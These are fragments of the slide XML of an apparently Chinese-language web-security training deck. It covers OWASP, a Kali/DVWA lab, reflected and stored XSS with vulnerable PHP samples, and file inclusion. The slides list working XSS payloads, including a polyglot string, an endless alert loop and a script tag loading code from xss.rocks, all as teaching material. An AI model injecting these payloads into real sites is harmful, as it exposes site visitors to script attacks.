          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5910163" y="3995902"/>
            <a:ext cx="273588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網站漏洞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OWASP TOP 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>網站漏洞類型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HITCON ZERO DAY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7451396" y="155036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網站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</a:rPr>
              <a:t>滲透測試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</a:rPr>
              <a:t>網站漏洞掃描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80330" y="180097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網站原始碼檢測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0823" y="1523972"/>
            <a:ext cx="156966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網站應用程式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</a:rPr>
              <a:t>防火牆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2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448135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5A1185A-6E37-4F02-921F-821199E9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81" y="2950369"/>
            <a:ext cx="4414838" cy="957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群組 7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9" name="矩形 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448135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正常輸入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1C3CD23-44E9-4F9D-A23D-557B6B47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9" y="3166567"/>
            <a:ext cx="4800600" cy="12072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8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48392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3" y="1513984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0CF5C27-0E94-403C-9CBC-2FB99145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67" y="2576129"/>
            <a:ext cx="2735537" cy="2767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387303" y="5158159"/>
            <a:ext cx="45300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742639" y="4468454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48392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686055" y="2154321"/>
            <a:ext cx="6826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latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>﻿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header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"X-XSS-Protection: 0"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Is there any input?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array_key_exists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"name"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 &amp;&amp;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'name'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 !=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NULL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 {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Feedback for end user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'&lt;pre&gt;Hello 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'name'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 .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'&lt;/pre&gt;'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6200000">
            <a:off x="4219549" y="4891500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4157349" y="5470613"/>
            <a:ext cx="146706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使用者輸入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48392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686055" y="2154321"/>
            <a:ext cx="6826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4000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>﻿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header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"X-XSS-Protection: 0"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Is there any input?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if(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array_key_exists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"name"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 &amp;&amp;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'name'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 !=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NULL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) {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Feedback for end user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'&lt;pre&gt;Hello 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'name'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 .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'&lt;/pre&gt;'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0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6200000">
            <a:off x="3872853" y="4950870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B541768C-0AEF-42BD-9A4C-5032FB952E61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2605525" y="5523054"/>
            <a:ext cx="4031873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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>發現沒有對輸入做任何檢查，直接置入網頁中</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35992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448135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  <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3300" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="33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A045D81-F1A0-4BE1-AB0D-1931DCE4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54" y="2847317"/>
            <a:ext cx="4864894" cy="176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C04A6-EC94-4EC0-B726-92AECDBCE0E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2661225" y="4808106"/>
            <a:ext cx="4208412" cy="41549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</a:rPr>
              <a:t>&lt;script&gt;alert(“XSS ATTACK”)&lt;/script&gt;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1" name="矩形 1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448135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  <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3300" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="33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C04A6-EC94-4EC0-B726-92AECDBCE0E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2555717" y="4852372"/>
            <a:ext cx="4257576" cy="415498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</a:rPr>
              <a:t>&lt;/script&gt;&lt;script&gt;alert('XSS');&lt;/script&gt;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BC9D4A7-082B-40B5-9B4B-ED3DB8BB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79" y="2888578"/>
            <a:ext cx="4814888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群組 9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1" name="矩形 1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5531219" cy="6924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Reflected Cross Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" dirty="0"/>
              <a:t>https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="15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C04A6-EC94-4EC0-B726-92AECDBCE0E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1643499" y="2976501"/>
            <a:ext cx="5753339" cy="41549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</a:rPr>
              <a:t>&lt;SCRIPT SRC=http://xss.rocks/xss.js&gt;&lt;/SCRIPT&gt;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35E47FEB-EC27-4AE6-A2B0-BE6955DBA688}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2452485" y="1868029"/>
            <a:ext cx="423903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各種奇妙攻擊</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3300" dirty="0" err="1"/>
              <a:t>Playload</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="33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442E46E-D681-4032-8A4D-B0833762C09B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1643499" y="3411831"/>
            <a:ext cx="5753339" cy="10618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2100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:/*--&gt; &lt;/title&gt;&lt;/style&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>textarea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&lt;/script&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>svg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/onload='+/"/+/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onmouseover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=1/+/[*/[]/+alert(1)//'&gt;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4A902D0-2D20-4A41-A973-595EDF780DD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1643499" y="4493491"/>
            <a:ext cx="5753339" cy="73866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</a:rPr>
              <a:t>&lt; “&gt;&lt;/iframe&gt;&lt;script&gt;alert(123)&lt;/script&gt; &lt;body </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onLoad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=”while(true) alert(‘XSS’);”&gt; ‘”&gt;&lt;/title&gt;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6" name="矩形 15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9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421E6DF-4270-4A9E-98BF-8FA1CA8329F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1899171" y="2375401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BB"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>$_GET[ 'name' ]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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dirty="0">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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&lt;script&gt;alert(“XSS ATTACK”)&lt;/script&gt;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1" name="矩形 1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4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262764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Command injection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E580D41-8715-4FF2-87ED-D49DA41BAC1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1899171" y="2375401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BB"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>$_GET[ 'name' ]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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dirty="0">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000BB"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS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&lt;script&gt;alert(“XSS ATTACK”)&lt;/script&gt;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D4CB8F-CD29-4BA6-B4A8-FEC89375E3C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688164" y="2977158"/>
            <a:ext cx="7871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'&lt;pre&gt;Hello ' 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. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>&lt;script&gt;alert(“XSS ATTACK”)&lt;/script&gt;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 . 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'&lt;/pre&gt;'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="21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2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0B0E400-3829-40EA-98DD-5A83051EF907}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2030094" y="3605929"/>
            <a:ext cx="563853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瀏覽器讀到網頁中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>標籤的時候會直接執行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="21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382C8C5-9ED7-42CD-8B83-A9C6A694CF1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2552893" y="2604067"/>
            <a:ext cx="4038214" cy="113107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4050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>測試環境</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="4050" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kali Linux + Docker +DVWA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8" name="矩形 7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99816" y="4176585"/>
            <a:ext cx="354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Kali_2019_2_Docker_DVWA.ova</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10519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698" y="2991756"/>
            <a:ext cx="6712606" cy="557263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Cross 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29105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1728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CE7B8432-9C9F-4329-BD9D-C46A0A7A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39" y="2856950"/>
            <a:ext cx="4321969" cy="190023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2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1728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D44DE6A1-BD8C-426B-8EFA-9909ACBCF86A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3795837" y="18680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正常輸入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BC58F6E-2A89-4A9D-8E0D-4D0E7E45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22" y="2933502"/>
            <a:ext cx="4407694" cy="2350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92D15D2-C8B8-467D-AB94-5CAAD862CC09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2463782" y="4938702"/>
            <a:ext cx="1157681" cy="345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5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2920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3" y="1513984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4EE9DED-056F-43D9-97B0-0F44E53F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60" y="2687077"/>
            <a:ext cx="2650329" cy="2663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270491" y="5191709"/>
            <a:ext cx="45300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625827" y="4502004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8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2920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615580" y="1881851"/>
            <a:ext cx="83349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latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>﻿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0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'btnSign'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trim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'mtxMessage'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  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trim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'txtName'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Sanitize message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stripslashes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((isset(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&amp;&amp;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mysqli_real_escape_string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trigger_error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"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work."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E_USER_ERROR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?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Sanitize name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((isset(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&amp;&amp;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mysqli_real_escape_string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trigger_error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"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work."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E_USER_ERROR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?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Update database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"INSERT INTO guestbook ( comment, name ) VALUES ( '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', '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 );"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//mysql_close();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24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0800000">
            <a:off x="3165255" y="2560536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3840183" y="2599008"/>
            <a:ext cx="146706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使用者輸入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6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2920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615580" y="1881851"/>
            <a:ext cx="83349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latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>﻿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10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'btnSign'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Get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trim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'mtxMessage'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  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trim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$_POST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'txtName'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 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Sanitize message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stripslashes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((isset(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&amp;&amp;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mysqli_real_escape_string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trigger_error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"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work."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E_USER_ERROR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?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Sanitize name input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((isset(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&amp;&amp;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mysqli_real_escape_string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trigger_error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"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work."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,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E_USER_ERROR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?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 Update database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"INSERT INTO guestbook ( comment, name ) VALUES ( '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$message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', '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$name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 );"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10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1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF8000"/>
                </a:solidFill>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>//mysql_close(); </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="10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10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10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24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0" name="箭號: 向右 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{C0F69171-7500-44D7-8DBE-472814C13F0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="8973420">
            <a:off x="5035157" y="4176354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101C71BB-6B84-46E6-B0F2-0B24A8DCE4C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4527030" y="3716275"/>
            <a:ext cx="449353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發現沒有對輸入做任何檢查，直接置入資料庫中</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28930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4117287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Stored Cross Site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="15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D44DE6A1-BD8C-426B-8EFA-9909ACBCF86A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3795837" y="18680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3903C69-345C-40B3-A722-752679A8DC1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2559590" y="4869545"/>
            <a:ext cx="4194610" cy="415498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</a:rPr>
              <a:t>&lt;script&gt;alert(“XSS ATTACK”)&lt;/script&gt;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B941293E-7561-44AA-8D0E-3E1FE2F7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38" y="2933502"/>
            <a:ext cx="4264819" cy="1535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843E667-43FF-4B65-8C37-C5961D5D3A27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1636606" y="4517728"/>
            <a:ext cx="6164615" cy="3231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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>下一次在進留言版的用戶就會遭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻擊，大家重新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" dirty="0"/>
              <a:t>﻿</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>進入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" dirty="0"/>
              <a:t>XSS (Stored)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>試試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7" name="矩形 16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9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698" y="2991756"/>
            <a:ext cx="6712606" cy="557263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Inclusion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28974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46368" y="2263682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BF56317-E910-4264-AB9C-DA58EADF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28" y="2545922"/>
            <a:ext cx="3936206" cy="278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8ECCAA4-2D15-4C8D-85FB-D959B01AF8EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2650304" y="2067473"/>
            <a:ext cx="3824060" cy="4154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確定</a:t>
            </a:r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00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Enabled</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2100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88733A7-6291-404E-98A1-1F9E2386181D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4028831" y="4482937"/>
            <a:ext cx="1981200" cy="38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8ECCAA4-2D15-4C8D-85FB-D959B01AF8EC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CAADF1A-473B-4BFA-B0E3-B84B1C0F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74914"/>
            <a:ext cx="6222206" cy="414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81713" y="2244150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找到正在執行的容器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30915" y="2916339"/>
            <a:ext cx="1061829" cy="34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F208AE8-CF28-44B7-B391-E649A07EB46B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5836231" y="2916339"/>
            <a:ext cx="1061829" cy="34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3305060" y="2197984"/>
            <a:ext cx="1498601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docker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0" err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0"/>
              <a:t> -a</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="21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7" name="矩形 16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1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3545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Kali Linux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F3956C1-6CB6-4562-A10B-C20901EF496E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1972121" y="1554353"/>
            <a:ext cx="31164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https://zh.wikipedia.org/zh-tw/Kali_Linux</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="13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9068509-2C14-4216-B937-9BEAF3D2C9DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4367019" y="2073319"/>
            <a:ext cx="3343151" cy="4154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100" dirty="0"/>
              <a:t>Kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0"/>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>使用版本：2019.2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8ED6798-6B4B-4815-A10C-CA49061E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1" y="2200887"/>
            <a:ext cx="3470290" cy="2598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1CD68B1-B0B6-43EA-A801-9465800C2C75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4182841" y="2649327"/>
            <a:ext cx="4915020" cy="21441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14313" indent="-214313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Kali Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>內建擁有超過</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>600</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>種滲透工具</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="750"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>	{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" dirty="0"/>
              <a:t>Nmap(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>服務掃描工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" dirty="0"/>
              <a:t>), </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" dirty="0"/>
              <a:t>		Wireshark(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>封包分析工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" dirty="0"/>
              <a:t>), </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" dirty="0"/>
              <a:t>			Burp Suite(Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>安全測試工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" dirty="0"/>
              <a:t>), </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" dirty="0"/>
              <a:t>				</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" dirty="0" err="1"/>
              <a:t>Aircrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" dirty="0"/>
              <a:t>-ng(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1500" dirty="0"/>
              <a:t>無線網路密碼破解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" dirty="0"/>
              <a:t>)…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1500" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="214313" indent="-214313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它的主要功能為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>數位鑑識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滲透測試</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)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8ECCAA4-2D15-4C8D-85FB-D959B01AF8EC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CAADF1A-473B-4BFA-B0E3-B84B1C0F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74914"/>
            <a:ext cx="6222206" cy="414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81713" y="2244150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找到正在執行的容器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30915" y="2916339"/>
            <a:ext cx="1061829" cy="34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CF208AE8-CF28-44B7-B391-E649A07EB46B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5836231" y="2916339"/>
            <a:ext cx="1061829" cy="346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3305060" y="2197984"/>
            <a:ext cx="1498601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docker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0" err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" dirty="0"/>
              <a:t> -a</a:t>
            </a:r>
